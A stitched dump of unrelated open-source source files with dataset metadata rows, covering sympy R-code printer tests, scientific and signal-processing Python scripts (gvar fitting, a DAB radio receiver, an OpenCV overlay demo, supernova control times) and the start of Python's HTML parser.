assert rcode(Ne(x, y)) == "x != y"
assert rcode(Le(x, y)) == "x <= y"
assert rcode(Lt(x, y)) == "x < y"
assert rcode(Gt(x, y)) == "x > y"
assert rcode(Ge(x, y)) == "x >= y"
def test_rcode_Piecewise():
expr = Piecewise((x, x < 1), (x**2, True))
res=rcode(expr)
ref="ifelse(x < 1,x,x^2)"
assert res == ref
tau=Symbol("tau")
res=rcode(expr,tau)
ref="tau = ifelse(x < 1,x,x^2);"
assert res == ref
expr = 2*Piecewise((x, x < 1), (x**2, x<2), (x**3,True))
assert rcode(expr) == "2*ifelse(x < 1,x,ifelse(x < 2,x^2,x^3))"
res = rcode(expr, assign_to='c')
assert res == "c = 2*ifelse(x < 1,x,ifelse(x < 2,x^2,x^3));"
# Check that Piecewise without a True (default) condition error
#expr = Piecewise((x, x < 1), (x**2, x > 1), (sin(x), x > 0))
#raises(ValueError, lambda: rcode(expr))
expr = 2*Piecewise((x, x < 1), (x**2, x<2))
assert(rcode(expr))== "2*ifelse(x < 1,x,ifelse(x < 2,x^2,NA))"
def test_rcode_sinc():
from sympy import sinc
expr = sinc(x)
res = rcode(expr)
ref = "ifelse(x != 0,sin(x)/x,1)"
assert res == ref
def test_rcode_Piecewise_deep():
p = rcode(2*Piecewise((x, x < 1), (x + 1, x < 2), (x**2, True)))
assert p == "2*ifelse(x < 1,x,ifelse(x < 2,x + 1,x^2))"
expr = x*y*z + x**2 + y**2 + Piecewise((0, x < 0.5), (1, True)) + cos(z) - 1
p = rcode(expr)
ref="x^2 + x*y*z + y^2 + ifelse(x < 0.5,0,1) + cos(z) - 1"
assert p == ref
ref="c = x^2 + x*y*z + y^2 + ifelse(x < 0.5,0,1) + cos(z) - 1;"
p = rcode(expr, assign_to='c')
assert p == ref
def test_rcode_ITE():
expr = ITE(x < 1, y, z)
p = rcode(expr)
ref="ifelse(x < 1,y,z)"
assert p == ref
def test_rcode_settings():
raises(TypeError, lambda: rcode(sin(x), method="garbage"))
def test_rcode_Indexed():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o = symbols('n m o', integer=True)
i, j, k = Idx('i', n), Idx('j', m), Idx('k', o)
p = RCodePrinter()
p._not_r = set()
x = IndexedBase('x')[j]
assert p._print_Indexed(x) == 'x[j]'
A = IndexedBase('A')[i, j]
assert p._print_Indexed(A) == 'A[i, j]'
B = IndexedBase('B')[i, j, k]
assert p._print_Indexed(B) == 'B[i, j, k]'
assert p._not_r == set()
def test_rcode_Indexed_without_looking_for_contraction():
len_y = 5
y = IndexedBase('y', shape=(len_y,))
x = IndexedBase('x', shape=(len_y,))
Dy = IndexedBase('Dy', shape=(len_y-1,))
i = Idx('i', len_y-1)
e=Eq(Dy[i], (y[i+1]-y[i])/(x[i+1]-x[i]))
code0 = rcode(e.rhs, assign_to=e.lhs, contract=False)
assert code0 == 'Dy[i] = (y[%s] - y[i])/(x[%s] - x[i]);' % (i + 1, i + 1)
def test_rcode_loops_matrix_vector():
n, m = symbols('n m', integer=True)
A = IndexedBase('A')
x = IndexedBase('x')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = A[i, j]*x[j] + y[i];\n'
' }\n'
'}'
)
c = rcode(A[i, j]*x[j], assign_to=y[i])
assert c == s
def test_dummy_loops():
# the following line could also be
# [Dummy(s, integer=True) for s in 'im']
# or [Dummy(integer=True) for s in 'im']
i, m = symbols('i m', integer=True, cls=Dummy)
x = IndexedBase('x')
y = IndexedBase('y')
i = Idx(i, m)
expected = (
'for (i_%(icount)i in 1:m_%(mcount)i){\n'
' y[i_%(icount)i] = x[i_%(icount)i];\n'
'}'
) % {'icount': i.label.dummy_index, 'mcount': m.dummy_index}
code = rcode(x[i], assign_to=y[i])
assert code == expected
def test_rcode_loops_add():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m = symbols('n m', integer=True)
A = IndexedBase('A')
x = IndexedBase('x')
y = IndexedBase('y')
z = IndexedBase('z')
i = Idx('i', m)
j = Idx('j', n)
s = (
'for (i in 1:m){\n'
' y[i] = x[i] + z[i];\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = A[i, j]*x[j] + y[i];\n'
' }\n'
'}'
)
c = rcode(A[i, j]*x[j] + x[i] + z[i], assign_to=y[i])
assert c == s
def test_rcode_loops_multiple_contractions():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
l = Idx('l', p)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' for (l in 1:p){\n'
' y[i] = a[i, j, k, l]*b[j, k, l] + y[i];\n'
' }\n'
' }\n'
' }\n'
'}'
)
c = rcode(b[j, k, l]*a[i, j, k, l], assign_to=y[i])
assert c == s
def test_rcode_loops_addfactor():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
c = IndexedBase('c')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
l = Idx('l', p)
s = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' for (l in 1:p){\n'
' y[i] = (a[i, j, k, l] + b[i, j, k, l])*c[j, k, l] + y[i];\n'
' }\n'
' }\n'
' }\n'
'}'
)
c = rcode((a[i, j, k, l] + b[i, j, k, l])*c[j, k, l], assign_to=y[i])
assert c == s
def test_rcode_loops_multiple_terms():
from sympy.tensor import IndexedBase, Idx
from sympy import symbols
n, m, o, p = symbols('n m o p', integer=True)
a = IndexedBase('a')
b = IndexedBase('b')
c = IndexedBase('c')
y = IndexedBase('y')
i = Idx('i', m)
j = Idx('j', n)
k = Idx('k', o)
s0 = (
'for (i in 1:m){\n'
' y[i] = 0;\n'
'}\n'
)
s1 = (
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' for (k in 1:o){\n'
' y[i] = b[j]*b[k]*c[i, j, k] + y[i];\n'
' }\n'
' }\n'
'}\n'
)
s2 = (
'for (i in 1:m){\n'
' for (k in 1:o){\n'
' y[i] = a[i, k]*b[k] + y[i];\n'
' }\n'
'}\n'
)
s3 = (
'for (i in 1:m){\n'
' for (j in 1:n){\n'
' y[i] = a[i, j]*b[j] + y[i];\n'
' }\n'
'}\n'
)
c = rcode(
b[j]*a[i, j] + b[k]*a[i, k] + b[j]*b[k]*c[i, j, k], assign_to=y[i])
ref=dict()
ref[0] = s0 + s1 + s2 + s3[:-1]
ref[1] = s0 + s1 + s3 + s2[:-1]
ref[2] = s0 + s2 + s1 + s3[:-1]
ref[3] = s0 + s2 + s3 + s1[:-1]
ref[4] = s0 + s3 + s1 + s2[:-1]
ref[5] = s0 + s3 + s2 + s1[:-1]
assert (c == ref[0] or
c == ref[1] or
c == ref[2] or
c == ref[3] or
c == ref[4] or
c == ref[5])
def test_dereference_printing():
expr = x + y + sin(z) + z
assert rcode(expr, dereference=[z]) == "x + y + (*z) + sin((*z))"
def test_Matrix_printing():
# Test returning a Matrix
mat = Matrix([x*y, Piecewise((2 + x, y>0), (y, True)), sin(z)])
A = MatrixSymbol('A', 3, 1)
p = rcode(mat, A)
assert p == (
"A[0] = x*y;\n"
"A[1] = ifelse(y > 0,x + 2,y);\n"
"A[2] = sin(z);")
# Test using MatrixElements in expressions
expr = Piecewise((2*A[2, 0], x > 0), (A[2, 0], True)) + sin(A[1, 0]) + A[0, 0]
p = rcode(expr)
assert p == ("ifelse(x > 0,2*A[2],A[2]) + sin(A[1]) + A[0]")
# Test using MatrixElements in a Matrix
q = MatrixSymbol('q', 5, 1)
M = MatrixSymbol('M', 3, 3)
m = Matrix([[sin(q[1,0]), 0, cos(q[2,0])],
[q[1,0] + q[2,0], q[3, 0], 5],
[2*q[4, 0]/q[1,0], sqrt(q[0,0]) + 4, 0]])
assert rcode(m, M) == (
"M[0] = sin(q[1]);\n"
"M[1] = 0;\n"
"M[2] = cos(q[2]);\n"
"M[3] = q[1] + q[2];\n"
"M[4] = q[3];\n"
"M[5] = 5;\n"
"M[6] = 2*q[4]/q[1];\n"
"M[7] = sqrt(q[0]) + 4;\n"
"M[8] = 0;")
def test_rcode_sgn():
expr = sign(x) * y
assert rcode(expr) == 'y*sign(x)'
p = rcode(expr, 'z')
assert p == 'z = y*sign(x);'
p = rcode(sign(2 * x + x**2) * x + x**2)
assert p == "x^2 + x*sign(x^2 + 2*x)"
expr = sign(cos(x))
p = rcode(expr)
assert p == 'sign(cos(x))'
def test_rcode_Assignment():
assert rcode(Assignment(x, y + z)) == 'x = y + z;'
assert rcode(aug_assign(x, '+', y + z)) == 'x += y + z;'
def test_rcode_For():
f = For(x, Range(0, 10, 2), [aug_assign(y, '*', x)])
sol = rcode(f)
assert sol == ("for (x = 0; x < 10; x += 2) {\n"
" y *= x;\n"
"}")
def test_MatrixElement_printing():
# test cases for issue #11821
A = MatrixSymbol("A", 1, 3)
B = MatrixSymbol("B", 1, 3)
C = MatrixSymbol("C", 1, 3)
assert(rcode(A[0, 0]) == "A[0]")
assert(rcode(3 * A[0, 0]) == "3*A[0]")
F = C[0, 0].subs(C, A - B)
assert(rcode(F) == "(A - B)[0]")
| bsd-3-clause | -5,326,308,247,995,265,000 | 27.87169 | 105 | 0.482294 | false | 2.501941 | true | false | false |
gplepage/gvar | examples/svdcut.py | 1 | 2303 | """
svdcut.py --- Correlations and SVD Cuts
This code illustrates the use of SVD cuts when calculating
correlations using random samples. See the Case Study in the
documentation for more information.
"""
from __future__ import print_function
import numpy as np
import gvar as gv
try:
# may not be installed, in which case bail.
import lsqfit
except:
# fake the run so "make run" still works
outfile = open('svdcut.out', 'r').read()
print(outfile[:-1])
exit()
SHOW_PLOTS = False
def main():
gv.ranseed(4)
x = np.array([1., 2., 3., 4., 5., 6., 7., 8., 9., 10.])
y_samples = [
[2.8409, 4.8393, 6.8403, 8.8377, 10.8356, 12.8389, 14.8356, 16.8362, 18.8351, 20.8341],
[2.8639, 4.8612, 6.8597, 8.8559, 10.8537, 12.8525, 14.8498, 16.8487, 18.8460, 20.8447],
[3.1048, 5.1072, 7.1071, 9.1076, 11.1090, 13.1107, 15.1113, 17.1134, 19.1145, 21.1163],
[3.0710, 5.0696, 7.0708, 9.0705, 11.0694, 13.0681, 15.0693, 17.0695, 19.0667, 21.0678],
[3.0241, 5.0223, 7.0198, 9.0204, 11.0191, 13.0193, 15.0198, 17.0163, 19.0154, 21.0155],
[2.9719, 4.9700, 6.9709, 8.9706, 10.9707, 12.9705, 14.9699, 16.9686, 18.9676, 20.9686],
[3.0688, 5.0709, 7.0724, 9.0730, 11.0749, 13.0776, 15.0790, 17.0800, 19.0794, 21.0795],
[3.1471, 5.1468, 7.1452, 9.1451, 11.1429, 13.1445, 15.1450, 17.1435, 19.1425, 21.1432],
[3.0233, 5.0233, 7.0225, 9.0224, 11.0225, 13.0216, 15.0224, 17.0217, 19.0208, 21.0222],
[2.8797, 4.8792, 6.8803, 8.8794, 10.8800, 12.8797, 14.8801, 16.8797, 18.8803, 20.8812],
[3.0388, 5.0407, 7.0409, 9.0439, 11.0443, 13.0459, 15.0455, 17.0479, 19.0493, 21.0505],
[3.1353, 5.1368, 7.1376, 9.1367, 11.1360, 13.1377, 15.1369, 17.1400, 19.1384, 21.1396],
[3.0051, 5.0063, 7.0022, 9.0052, 11.0040, 13.0033, 15.0007, 16.9989, 18.9994, 20.9995],
]
y = gv.dataset.avg_data(y_samples)
svd = gv.dataset.svd_diagnosis(y_samples)
y = gv.svd(y, svdcut=svd.svdcut)
if SHOW_PLOTS:
svd.plot_ratio(show=True)
def fcn(p):
return p['y0'] + p['s'] * x
prior = gv.gvar(dict(y0='0(5)', s='0(5)'))
fit = lsqfit.nonlinear_fit(data=y, fcn=fcn, prior=prior)
print(fit)
if __name__ == '__main__':
main()
| gpl-3.0 | 5,101,233,874,259,818,000 | 40.125 | 98 | 0.583152 | false | 2.156367 | false | false | false |
alex-ip/agdc | agdc/landsat_ingester/__main__.py | 1 | 2058 | #!/usr/bin/env python
# ===============================================================================
# Copyright (c) 2014 Geoscience Australia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither Geoscience Australia nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ===============================================================================
"""
landsat_ingester.py - Ingester script for landsat datasets.
"""
from __future__ import absolute_import
from agdc.landsat_ingester import LandsatIngester
from agdc.abstract_ingester import run_ingest
if __name__ == "__main__":
run_ingest(LandsatIngester)
| bsd-3-clause | 2,366,633,804,520,542,700 | 49.45 | 86 | 0.68999 | false | 4.48366 | false | false | false |
GAMPTeam/vampyre | demos/mlp/randmlp.py | 1 | 3387 | # -*- coding: utf-8 -*-
"""
randmlp: Random MLP class definitions
@author: Sundeep
"""
import numpy as np
import pickle
"""
Randomly generated multilayer perceptron
"""
class RandomMLP:
"""
Constructor
"""
def __init__(self, nin, nhid, nout, sparse_tgt=[]):
# Get dimensions
self.nin = nin
self.nhid = nhid
self.nout = nout
self.nlayers = len(nhid)
# Sparsity target to adjust bias levels in each layer
if sparse_tgt is None:
self.sparse_tgt = 0.4*np.ones(self.nlayers)
else:
self.sparse_tgt = sparse_tgt
# Number of samples used in calibrating the parameters
self.ns = 100
# Pickle file name
self.save_file = 'mlp.p'
"""
Saves the weights to a pickle file
"""
def save_weigths(self):
pickle.dump((self.Ws,self.bs), open(self.save_file, "wb") )
"""
Restore weights
"""
def restore_weigths(self):
self.Ws, self.bs = pickle.load(open(self.save_file, "rb") )
"""
Generate random weights based on sparsity in each layer
"""
def gen_weigths(self):
# Create list to store weights and biases
self.Ws = []
self.bs = []
self.z0s = []
self.z1s = []
# Generate random input
x = np.random.randn(self.nin,self.ns)
z0 = x
for i in range(self.nlayers+1):
self.z0s.append(z0)
# Get dimensions for the layer
n0 = z0.shape[0]
if i==self.nlayers:
n1 = self.nout
stgt = 1
else:
n1 = self.nhid[i]
stgt = self.sparse_tgt[i]
# Generate linear outputs w/o bias
z0norm = np.mean(np.abs(z0)**2)
W = np.random.randn(n1,n0)/np.sqrt(n0*z0norm)
z1 = W.dot(z0)
# Sort to find the biases that adjust the correct sparsity
# level
if stgt < 1:
zsort = np.sort(z1,axis=1)
itgt = int((1-stgt)*self.ns)
b = -zsort[:,itgt]
else:
b = np.random.randn(n1)
z1 = z1 + b[:,None]
# Apply the ReLU for the next layer
z0 = np.maximum(0, z1)
# Save the weights and biases
self.Ws.append(W)
self.bs.append(b)
self.z1s.append(z1)
"""
Generate the outputs given input x
"""
def run(self, z0=[], ns=10):
# Generate initial random initial states if they are unspecified
if z0 == []:
z0 = np.random.randn(self.nin,ns)
# Lists to store intermediate variables
zs = []
# Loop over layers
for i in range(self.nlayers+1):
# Save input
zs.append(z0)
# Linear weights
W = self.Ws[i]
b = self.bs[i]
z1 = W.dot(z0)+b[:,None]
# Save ouptut
zs.append(z1)
# ReLU for the next layer
z0 = np.maximum(0, z1)
return zs
| mit | -1,413,568,176,545,062,700 | 25.460938 | 72 | 0.459404 | false | 3.801347 | false | false | false |
kit-cel/gr-dab | apps/dab_rx_constellation.py | 1 | 6407 | #!/usr/bin/env python2
# -*- coding: utf8 -*-
# Andreas Müller, 2008
# [email protected]
#
# this code may be freely used under GNU GPL conditions
"""
demodulate DAB signal and ouput to constellation sink
"""
from gnuradio import gr, uhd, blocks
from gnuradio import eng_notation
from gnuradio.eng_option import eng_option
from gnuradio.wxgui import stdgui2, fftsink2, scopesink2
import dab
from optparse import OptionParser
import wx
import sys, threading, time
class usrp_dab_gui_rx(stdgui2.std_top_block):
def __init__(self, frame, panel, vbox, argv):
stdgui2.std_top_block.__init__(self, frame, panel, vbox, argv)
self.frame = frame
self.panel = panel
parser = OptionParser(option_class=eng_option, usage="%prog: [options] <filename>")
parser.add_option("-m", "--dab-mode", type="int", default=1,
help="DAB mode [default=%default]")
parser.add_option("-F", "--filter-input", action="store_true", default=False,
help="Enable FFT filter at input")
parser.add_option('-c', '--correct-ffe', action="store_true", default=False,
help="do fine frequency correction")
parser.add_option('-u', '--correct-ffe-usrp', action="store_true", default=False,
help="do fine frequency correction by retuning the USRP instead of in software")
parser.add_option('-e', '--equalize-magnitude', action="store_true", default=False,
help="do magnitude equalization")
parser.add_option("-s", "--resample-fixed", type="eng_float", default=1,
help="resample by a fixed factor (fractional interpolation)")
parser.add_option("-S", "--autocorrect-sample-rate", action="store_true", default=False,
help="Estimate sample rate offset and resample (dynamic fractional interpolation)")
parser.add_option("-R", "--rx-subdev-spec", type="subdev", default=(0, 0),
help="select USRP Rx side A or B [default=A]")
parser.add_option("-f", "--freq", type="eng_float", default=227.36e6,
help="set frequency to FREQ [default=%default]")
parser.add_option("-r", "--sample-rate", type="int", default=2000000,
help="set sample rate to SAMPLE_RATE [default=%default]")
parser.add_option("-d", "--decim", type="intx", default=32,
help="set decimation rate to DECIM [default=%default]")
parser.add_option("-g", "--rx-gain", type="eng_float", default=None,
help="set receive gain in dB (default is midpoint)")
parser.add_option('-v', '--verbose', action="store_true", default=False,
help="verbose output")
parser.add_option('-a', '--antenna', type="string", default="TX/RX",
help="select antenna")
(options, args) = parser.parse_args()
self.verbose = options.verbose
if len(args) == 0:
if self.verbose:
print "--> receiving from USRP"
self.src = uhd.usrp_source("",uhd.io_type.COMPLEX_FLOAT32,1)
#self.src.set_mux(usrp.determine_rx_mux_value(self.src, options.rx_subdev_spec))
#self.subdev = usrp.selected_subdev(self.src, options.rx_subdev_spec)
#if self.verbose:
# print "--> using RX dboard " + self.subdev.side_and_name()
# tune frequency
self.frequency = options.freq
self.set_freq(options.freq)
# set gain
if options.rx_gain is None:
# if no gain was specified, use the mid-point in dB
g = self.src.get_gain_range()
options.rx_gain = float(g.start()+g.stop())/2
self.src.set_gain(options.rx_gain)
self.sample_rate = 2e6#self.src.adc_rate()/options.decim
self.src.set_samp_rate(self.sample_rate)
self.src.set_antenna(options.antenna)
else:
if self.verbose:
print "--> receiving from file: " + args[0]
self.filename = args[0]
self.src = blocks.file_source(gr.sizeof_gr_complex, self.filename, False)
self.sample_rate = options.sample_rate
self.dab_params = dab.parameters.dab_parameters(mode=options.dab_mode, sample_rate=self.sample_rate, verbose=options.verbose)
self.rx_params = dab.parameters.receiver_parameters(mode=options.dab_mode, softbits=True, input_fft_filter=options.filter_input, autocorrect_sample_rate=options.autocorrect_sample_rate, sample_rate_correction_factor=options.resample_fixed, verbose=options.verbose, correct_ffe=options.correct_ffe, equalize_magnitude=options.equalize_magnitude)
self.demod = dab.ofdm_demod(self.dab_params, self.rx_params, verbose=self.verbose)
self.v2s = blocks.vector_to_stream(gr.sizeof_gr_complex, self.dab_params.num_carriers)
self.scope = scopesink2.scope_sink_c(self.panel, title="DAB constellation sink", sample_rate=self.dab_params.sample_rate, xy_mode=True)
self.trigsink = blocks.null_sink(gr.sizeof_char)
self.sink = blocks.null_sink(gr.sizeof_float*self.dab_params.num_carriers*2)
self.connect(self.src, self.demod, self.sink)
self.connect((self.demod,1), self.trigsink)
# build GUI
self.connect(self.demod.deinterleave, self.v2s, self.scope)
vbox.Add(self.scope.win, 10, wx.EXPAND)
self.wxgui_fftsink2_0 = fftsink2.fft_sink_c(
self.panel,
baseband_freq=0,
y_per_div=10,
y_divs=10,
ref_level=0,
ref_scale=2.0,
sample_rate=self.sample_rate,
fft_size=1024,
fft_rate=15,
average=False,
avg_alpha=None,
title="FFT Plot",
peak_hold=False,
)
vbox.Add(self.wxgui_fftsink2_0.win)
self.connect((self.src, 0), (self.wxgui_fftsink2_0, 0))
# retune USRP to correct FFE?
self.correct_ffe_usrp = options.correct_ffe_usrp
if self.correct_ffe_usrp:
print "--> correcting FFE on USRP"
self.run_correct_ffe_thread = True
self.ffe_updater = threading.Timer(0.1, self.correct_ffe)
self.ffe_updater.setDaemon(True)
self.ffe_updater.start()
def correct_ffe(self):
while self.run_correct_ffe_thread:
diff = self.demod.sync.ffs_sample_and_average_arg.ffe_estimate()
if abs(diff) > self.rx_params.usrp_ffc_min_deviation:
self.frequency -= diff*self.rx_params.usrp_ffc_adapt_factor
print "--> updating fine frequency correction: " + str(self.frequency)
self.set_freq(self.frequency)
time.sleep(1./self.rx_params.usrp_ffc_retune_frequency)
def set_freq(self, freq):
if self.src.set_center_freq(freq):
if self.verbose:
print "--> retuned to " + str(freq) + " Hz"
return True
else:
print "-> error - cannot tune to " + str(freq) + " Hz"
return False
if __name__ == '__main__':
app = stdgui2.stdapp(usrp_dab_gui_rx, "usrp_dab_gui_rx", nstatus=1)
app.MainLoop()
| gpl-3.0 | 8,074,108,952,524,165,000 | 38.54321 | 346 | 0.685295 | false | 2.905215 | false | false | false |
reliableJARED/python | opencv/video_on_video_overlay_tracked_obj.py | 1 | 4338 | '''
This code will put a video on a colored object (like a green ball)in the main
video stream. It will resize the overlay video on the fly
based on big the tracked object is. The code will not work without
the file: hist_for_tracking.png
that is the 'color calibration' image. The program does allow you
to calibrate to any color. press 'x' while an image is in the
green box shown on the screen and it will recalibrate to
that and update the 'hist_for_tracking.png' . You also need something to overlay. replace
'video1.mp4' with what ever video or image you want to overlay on the tracked object.
I can show you how to use this program if you're
looking for this type of application. Its just a basic demo
'''
#need sys import to use any no python env files like common.py
import sys
sys.path.append('/home/jared/PythonWork/opencv')
import cv2 #NOTE: this is from OpenCV
import numpy as np
#get video frame
frame = cv2.VideoCapture(0)
def read_overlay():
vid = cv2.VideoCapture('video1.mp4')
return vid
while (True):
#get pic to be used as tracking histogram
roi = cv2.imread('hist_for_tracking.png')
search_hsv = cv2.cvtColor(roi,cv2.COLOR_BGR2HSV)
#get next video frame
check, img = frame.read()
#this try/except if is used to start the overlay video, and keep looping it
try:
check2, track_img = vid.read()
except:
vid = read_overlay()
check2, track_img = vid.read()
if check2 == False:
vid = read_overlay()
check2, track_img = vid.read()
#when check2 == False, the vid is over.
find_hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
#calculate histogram of color to look for
#calcHist([image],[channel],mask,[histogram bin count(256 full)],range(256 full))
roihist = cv2.calcHist([search_hsv],[0,1], None, [50,256], [0,180,0,256] )
#ORIGINAL:
#roihist = cv2.calcHist([search_hsv],[0,1], None, [180,256], [0,180,0,256] )
# normalize histogram and apply backprojection
cv2.normalize(roihist,roihist,0,255,cv2.NORM_MINMAX)
dst = cv2.calcBackProject([find_hsv],[0,1],roihist,[0,180,0,256],1)
# Now convolute with circular disc
#--not sure what that means
disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
cv2.filter2D(dst,-1,disc,dst)
#Find all the blobs that match tracked color
#using dst as input will be looking for black and white as dst has no color
contours, hier = cv2.findContours(dst,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
#determine which contour is the largest
big_area = 0
for shape in contours:
check = cv2.contourArea(shape)
if check > big_area:
#set new biggest area
big_area = cv2.contourArea(shape)
#identify largest shape so that x,y is known
big_shape = shape
if big_shape.any():
if 10<cv2.contourArea(big_shape):
#determine shape of a rectangle that would enclose the obj
(x,y,w,h) = cv2.boundingRect(big_shape)
#read image to be displayed
if check2==True:
pic = track_img
#resize image based on boundingRect() coordinates
new_dimensions = (int(w),int(h))
new_pic = cv2.resize(pic,new_dimensions,interpolation=cv2.INTER_AREA)
img[y:y+h,x:x+w]=new_pic
if check2 == False:
vid.release()
# threshold and binary AND
ret,thresh = cv2.threshold(dst,50,255,0)
thresh = cv2.merge((thresh,thresh,thresh))
resb = cv2.bitwise_and(img, thresh)
cv2.imshow('color_select',resb)
#put rectangle on screen where screen shot will grab from
cv2.rectangle(img,(250,200),(350,300),(0,255,0),2)
cv2.imshow('live',img)
ScreenShot = cv2.waitKey(25)& 0xFF
if ScreenShot == ord('x'):
#if 'x' is pressed
#displays a screen shot of image in rectangle
#saves it for use in histogram[y:y,x:x]
cv2.imshow('Color2Track',img[200:300,250:350])
cv2.imwrite('hist_for_tracking.png',img[200:300,250:350])
if cv2.waitKey(25) &0xFF== ord('q'):
#when everything done, release the capture
frame.release()
cv2.destroyAllWindows()
break
| gpl-3.0 | -4,845,308,143,406,473,000 | 35.453782 | 90 | 0.638774 | false | 3.386417 | false | false | false |
cosmodesi/snsurvey | src/control.py | 1 | 1120 | #!/usr/bin/env python
import numpy
import sncosmo
import scipy.optimize
import matplotlib.pyplot as plt
model=sncosmo.Model(source='salt2-extended')
def f(t ,rlim):
# print t, model.bandflux('desr',t, zp = rlim, zpsys='ab')
return model.bandflux('desr',t, zp = rlim, zpsys='ab')-1.
def controlTime(z,rlim):
model.set(z=z, t0=55000.)
model.set_source_peakabsmag(absmag=-19.3,band='bessellb',magsys='ab')
pre = scipy.optimize.fsolve(f, 55000.-15*(1+z) ,args=(rlim),xtol=1e-8)
post = scipy.optimize.fsolve(f, 55000.+20*(1+z) ,args=(rlim),xtol=1e-8)
return max(post[0]-pre[0],0)
# print scipy.optimize.fsolve(f, 55000.+40,args=(rlim),factor=1.,xtol=1e-8)
def plot():
lmag = numpy.arange(19.5,21.6,0.5)
zs = numpy.arange(0.02, 0.2501,0.02)
ans = []
for lm in lmag:
ans_=[]
for z in zs:
ans_.append(controlTime(z,lm))
ans.append(ans_)
for lm, ct in zip(lmag, ans):
plt.plot(zs, ct, label = '$r_{{lim}} = {}$'.format(str(lm)))
plt.xlabel(r'$z$')
plt.ylabel(r'control time (days)')
plt.legend()
plt.show()
| bsd-3-clause | -1,581,675,154,253,889,500 | 26.317073 | 79 | 0.605357 | false | 2.528217 | false | false | false |
prefetchnta/questlab | bin/x64bin/python/37/Lib/html/parser.py | 1 | 18191 | """A parser for HTML and XHTML."""
# This file is based on sgmllib.py, but the API is slightly different.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special).
import re
import warnings
import _markupbase
from html import unescape
__all__ = ['HTMLParser']
# Regular expressions used for parsing
interesting_normal = re.compile('[&<]')
incomplete = re.compile('&[a-zA-Z#]')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')
starttagopen = re.compile('<[a-zA-Z]')
piclose = re.compile('>')
commentclose = re.compile(r'--\s*>')
# Note:
# 1) if you change tagfind/attrfind remember to update locatestarttagend too;
# 2) if you change tagfind/attrfind and/or locatestarttagend the parser will
# explode, so don't do it.
# see http://www.w3.org/TR/html5/tokenization.html#tag-open-state
# and http://www.w3.org/TR/html5/tokenization.html#tag-name-state
tagfind_tolerant = re.compile(r'([a-zA-Z][^\t\n\r\f />\x00]*)(?:\s|/(?!>))*')
attrfind_tolerant = re.compile(
r'((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*')
locatestarttagend_tolerant = re.compile(r"""
<[a-zA-Z][^\t\n\r\f />\x00]* # tag name
(?:[\s/]* # optional whitespace before attribute name
(?:(?<=['"\s/])[^\s/>][^\s/=>]* # attribute name
(?:\s*=+\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|"[^"]*" # LIT-enclosed value
|(?!['"])[^>\s]* # bare value
)
(?:\s*,)* # possibly followed by a comma
)?(?:\s|/(?!>))*
)*
)?
\s* # trailing whitespace
""", re.VERBOSE)
endendtag = re.compile('>')
# the HTML 5 spec, section 8.1.2.2, doesn't allow spaces between
# </ and the tag name, so maybe this should be fixed
endtagfind = re.compile(r'</\s*([a-zA-Z][-.a-zA-Z0-9:_]*)\s*>')
class HTMLParser(_markupbase.ParserBase):
"""Find tags and other markup and call handler functions.
Usage:
p = HTMLParser()
p.feed(data)
...
p.close()
Start tags are handled by calling self.handle_starttag() or
self.handle_startendtag(); end tags by self.handle_endtag(). The
data between tags is passed from the parser to the derived class
by calling self.handle_data() with the data as argument (the data
may be split up in arbitrary chunks). If convert_charrefs is
